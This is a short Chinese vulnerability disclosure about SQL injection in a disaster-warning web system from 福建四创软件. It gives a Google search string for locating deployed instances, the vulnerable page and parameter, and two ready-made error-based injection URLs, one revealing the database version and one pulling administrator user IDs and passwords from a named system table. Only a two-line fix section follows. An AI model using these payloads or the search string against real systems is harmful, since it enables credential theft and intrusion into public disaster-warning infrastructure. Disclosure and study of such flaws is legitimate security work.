### 0x01 框架介绍
四创软件――中国防灾减灾信息与应用服务提供商,是国内企业信息防灾第一人。
影响厂商:福建四创软件有限公司
官方主页:http://www.strongsoft.net

谷歌搜索: intitle:预警 系统 技术支持:福建四创

### 0x02 漏洞利用
注入链接:/Disaster/ReportCount.aspx?tabnm=1
注入参数:tabnm
【获取数据库版本】
/Disaster/ReportCount.aspx?tabnm=1%27%2b(select+1+where+1=convert(int,@@version))%2b%27
【管理员账号密码】
/Disaster/ReportCount.aspx?tabnm=1%27%2b(select+1+where+1=convert(int,(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser)))%2b%27
测试案例:

获取管理员密码:

### 0x03 修复方案
1、过滤漏洞文件参数
2、使用加速乐等防护产品
暂无评论